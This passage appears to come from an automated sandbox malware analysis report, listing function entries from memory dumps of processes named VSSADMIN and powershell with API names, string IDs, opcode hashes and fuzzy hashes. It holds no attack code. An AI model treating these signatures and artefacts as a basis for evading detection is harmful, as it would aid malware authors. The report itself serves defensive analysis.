                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007D592F1170
                                                                                                                                                                      • String ID: ..\s\crypto\x509v3\v3_utl.c$TRUE
                                                                                                                                                                      • API String ID: 4247867426-4249600833
                                                                                                                                                                      • Opcode ID: f6c348c2a3a98660fe814743a8586d2045fedeffcd3228dedd6face5aebd5a41
                                                                                                                                                                      • Instruction ID: 3818b598d7c902feb4555ed55ef76cf18f3e0cb669f362387e53de3826a9e6b6
                                                                                                                                                                      • Opcode Fuzzy Hash: f6c348c2a3a98660fe814743a8586d2045fedeffcd3228dedd6face5aebd5a41
                                                                                                                                                                      • Instruction Fuzzy Hash: D831C023F0A74A85FA189F52A4247A963A0AF84780F484436EF4D27785EF3EE541E301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8C138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                      • Opcode ID: 9641b601b92cf1c294df7ef4fdae47acd46cee34d30520abb55b7c3ed1eb45b0
                                                                                                                                                                      • Instruction ID: 105004092851e96d1fb8d19be8496505c19edd8cfd7d6e0b675a146e1da7a494
                                                                                                                                                                      • Opcode Fuzzy Hash: 9641b601b92cf1c294df7ef4fdae47acd46cee34d30520abb55b7c3ed1eb45b0
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D418232618A4296DB20CF65E4843BA6771FB99BA4F504036EE4DC7798DF3CD441D740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF39BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: ..\s\crypto\rand\randfile.c$Filename=
                                                                                                                                                                      • API String ID: 3568877910-2201148535
                                                                                                                                                                      • Opcode ID: 6f88aa77b3787b65bf21e9a5eb4250f5c66180b7d9e03cb661efe32528626253
                                                                                                                                                                      • Instruction ID: 03af7a973474a73f1550f85d44679be2ce6fd4aae8fe07d5c89a59eaebd24924
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f88aa77b3787b65bf21e9a5eb4250f5c66180b7d9e03cb661efe32528626253
                                                                                                                                                                      • Instruction Fuzzy Hash: FA31AEB2B1CB4A86EA28DF25E4607A973A1EF84744F804136DB1D07695EF3DE508E741
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8E538 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                      • String ID: :
                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                      • Opcode ID: ec3214c4d7917cf546e280b353fd1dbc1381fd762ef9d9999209277b74e9521f
                                                                                                                                                                      • Instruction ID: 2dfe0e81140b3302117c91b007f1316cc101a4416b68701f276e916ffa950930
                                                                                                                                                                      • Opcode Fuzzy Hash: ec3214c4d7917cf546e280b353fd1dbc1381fd762ef9d9999209277b74e9521f
                                                                                                                                                                      • Instruction Fuzzy Hash: 3621B172A08A8282EB209B15D48427E63B1FB86F64F454037DA8DC3684DF7DE985DB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF338C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastgetsockname
                                                                                                                                                                      • String ID: ..\s\crypto\bio\b_sock.c
                                                                                                                                                                      • API String ID: 566540725-540685895
                                                                                                                                                                      • Opcode ID: 6b4fc8a7a88fb01f9812228e0b07841756f3377f257988557045c535e6cc1a7b
                                                                                                                                                                      • Instruction ID: 0d93c62effcc2fc412836c9601d0ba00da83e6a1d128a697e0a57631ed443482
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b4fc8a7a88fb01f9812228e0b07841756f3377f257988557045c535e6cc1a7b
                                                                                                                                                                      • Instruction Fuzzy Hash: 2821B0B2B0860A86E724DF60E8616EEB360EF80755F400135EB6C02AD4DF7DE599EB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C72770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ByteCharMultiWide
                                                                                                                                                                      • String ID: Fatal error detected
                                                                                                                                                                      • API String ID: 1878133881-4025702859
                                                                                                                                                                      • Opcode ID: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
                                                                                                                                                                      • Instruction ID: a49303f06f8780b8e014b4f9c7065a12ecf7965e4abde25aa76fce8a106fb723
                                                                                                                                                                      • Opcode Fuzzy Hash: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
                                                                                                                                                                      • Instruction Fuzzy Hash: D821A67262CA8292EB20DB14F4906EA7374FF95B98F805136E64D87A65DF3DD245C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C72890 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ByteCharMultiWide
                                                                                                                                                                      • String ID: Error detected
                                                                                                                                                                      • API String ID: 1878133881-3513342764
                                                                                                                                                                      • Opcode ID: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
                                                                                                                                                                      • Instruction ID: e4213435244b9469cfa5219e9e3788d136793a4e1cb18b9816c5f1dd7773f744
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
                                                                                                                                                                      • Instruction Fuzzy Hash: BA21867262CA8292EB20D714F4916EAB374FF95B98F805136E68D87A65DF3DD205C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7EFE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                      • Opcode ID: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
                                                                                                                                                                      • Instruction ID: fec1f0a4ab71d96dae5c7cde083ccec8d9e5605f7e08bb13d27bbcb3617339c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
                                                                                                                                                                      • Instruction Fuzzy Hash: A8113D32608F8182EB158F15F48026977A4FB89FA8F184235DF8D47764DF3DD5518700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8F03C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: :
                                                                                                                                                                      • API String ID: 2595371189-336475711
                                                                                                                                                                      • Opcode ID: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
                                                                                                                                                                      • Instruction ID: c4f82c2235458d99cb60745b9e31a72a69d7a9732c52fc391b20815b90c59dec
                                                                                                                                                                      • Opcode Fuzzy Hash: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
                                                                                                                                                                      • Instruction Fuzzy Hash: C1018461A1CA438AFB209F6094E127E63B0EF46B68F440137D74DC7691EF2DE545DA18
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF6BEA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastioctlsocket
                                                                                                                                                                      • String ID: ..\s\crypto\bio\b_sock.c
                                                                                                                                                                      • API String ID: 1021210092-540685895
                                                                                                                                                                      • Opcode ID: 4d68a102142dda0a141e0aa41e49ba71bac8bdbe77c0eb6d10dc70971b8a66ca
                                                                                                                                                                      • Instruction ID: 291cba6b400d356c539aa8b98ba3f851da15430f0dc7b5655f966bf069994d25
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d68a102142dda0a141e0aa41e49ba71bac8bdbe77c0eb6d10dc70971b8a66ca
                                                                                                                                                                      • Instruction Fuzzy Hash: 86E0D861F0860B86F7185F60E870B792350EF44705F000534EF5D82790DF2DE558AA00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FFCDFCB67F5 Relevance: .4, Instructions: 445COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205715498.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 218e1b302597229f65b0dfd977a784d911dfa0ddb02c1604bd0712749584263a
                                                                                                                                                                      • Instruction ID: 239bbca0a9d0f20ccb27ed54938c24129131d8096f4f457731595a39f882fa1c
                                                                                                                                                                      • Opcode Fuzzy Hash: 218e1b302597229f65b0dfd977a784d911dfa0ddb02c1604bd0712749584263a
                                                                                                                                                                      • Instruction Fuzzy Hash: F7D12436A0DAAE4FEBA5976898151BD7BA1FF85390F0801FFD05DC70D3DA18A814D351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFCDFBE79AA Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205424181.00007FFCDFBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFBE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfbe0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
